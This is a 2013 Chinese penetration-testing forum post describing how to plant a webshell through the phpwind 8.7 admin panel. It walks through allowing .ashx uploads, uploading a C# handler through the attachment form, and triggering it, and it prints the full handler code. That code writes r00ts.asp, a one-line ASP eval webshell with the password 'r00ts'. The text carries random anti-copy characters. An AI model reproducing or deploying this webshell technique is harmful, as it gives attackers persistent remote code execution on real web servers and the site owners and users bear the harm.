中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]
作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
0 @+ c' P* a! A; x, {! h- X4 Q - ~! T8 o; ?8 [7 r
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx: q! B  N8 C9 G( f4 R
% y9 [% ~& H" ~) I5 k
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
! y8 x/ I' {8 A% a- U- i 6 U- e  U3 s7 e0 I! g5 Y
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
' ]8 p) Z7 ^9 _6 J! z1 |
. l+ K) S  A, K- s9 J! A2 A打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
  \7 m( g3 \; @8 ?$ m7 D4 N
0 `! [: _4 x7 ^2 o: d下面是代码:( G8 D1 J5 c  b  j4 l7 U/ Y
8 J9 p$ b$ U' W& {) d* }2 Z9 m; _
<%@ WebHandler Language="C#"Class="Handler" %>
+ [& O, q: D; W0 v  [using System;
  Q2 k6 \% B* B9 E9 c( E4 Uusing System.Web;
1 {$ T' f( s, W5 H2 q# j5 busing System.IO;
9 l  g/ t! [4 hpublic class Handler : IHttpHandler {3 x( q& u- b1 ?1 v
public void ProcessRequest (HttpContext context) {
7 J$ I# U$ ~, S; @0 I3 f! Ycontext.Response.ContentType = "text/plain";
4 p& y0 Y/ {+ h# l, J" pStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
6 @- T8 [5 e8 f1 L; ffile1.Write("<%eval request(\"r00ts\")%>");# W+ e9 h) Q3 [% i: ]9 z
file1.Flush();
7 ^9 F* V8 m2 H" Ofile1.Close();
- u8 k* |  F2 x9 o}
% `5 G0 Z& }& Y# @1 e: Dpublic bool IsReusable {2 x' y; a3 ]$ N
get {2 _3 S! u& S5 C. _+ t
return false;/ p! c- h0 {6 J
}
1 q) K! }8 b; r" c}
, u4 v+ k6 ?3 T8 l3 d  o}
" {8 t5 o: t9 y3 H* ]7 m8 T6 I- V



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2